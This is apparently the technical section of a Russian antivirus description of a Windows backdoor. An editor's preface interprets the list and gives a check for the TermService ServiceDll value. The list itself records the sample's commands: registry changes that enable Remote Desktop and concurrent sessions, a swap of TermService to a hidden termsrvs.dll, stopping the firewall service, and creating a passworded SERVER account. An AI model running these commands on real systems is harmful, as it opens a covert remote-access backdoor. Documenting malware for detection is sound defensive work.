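Техническая информация
Подзаголовки разделов в этом списке не сохранились. Судя по содержимому, строки с reg.exe, net.exe и net1.exe описывают включение подключений к службе терминалов (fDenyTSConnections = 0), разрешение параллельных сеансов, подмену ServiceDll службы TermService на termsrvs.dll, остановку службы sharedaccess и создание учётной записи SERVER; далее, по-видимому, перечислены затронутые процессы и файлы. При проверке системы стоит сверить значение ServiceDll в HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters: штатно оно указывает на %SystemRoot%\System32\termsrv.dll.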
- <SYSTEM32>\reg.exe ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
- <SYSTEM32>\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
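- <SYSTEM32>\net1.exe localgroup %USERNAME%s SERVER /add (вероятно, имя группы — «Administrators»: подстрока «Administrator», по-видимому, заменена макросом %USERNAME% при формировании отчёта)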
- <SYSTEM32>\reg.exe ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
- <SYSTEM32>\attrib.exe +h +s +r <SYSTEM32>\dllcache\termsrvs.dll
- <SYSTEM32>\attrib.exe +H +S +R <SYSTEM32>\termsrvs.dll
- <SYSTEM32>\reg.exe ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d <SYSTEM32>\termsrvs.dll /f
- <SYSTEM32>\tasklist.exe /svc
- <SYSTEM32>\net1.exe stop sharedaccess /Y
- <SYSTEM32>\net.exe stop sharedaccess /Y
- <SYSTEM32>\findstr.exe /i "TermService" 111111.txt
- <SYSTEM32>\net1.exe user SERVER 8204161424 /add
- <SYSTEM32>\shutdown.exe -a
- <SYSTEM32>\taskkill.exe /pid 832 /f /t
- <SYSTEM32>\svchost.exe
- <SYSTEM32>\wbem\wmiprvse.exe
- <Текущая директория>\222222.txt
- <SYSTEM32>\termsrvs.dll
- <SYSTEM32>\dllcache\termsrvs.dll
- <Текущая директория>\termsrvs.dll
- %TEMP%\bt8033.bat
- <Текущая директория>\111111.txt
- <SYSTEM32>\dllcache\termsrvs.dll
- <SYSTEM32>\termsrvs.dll
- %TEMP%\bt8033.bat
- ClassName: '' WindowName: ''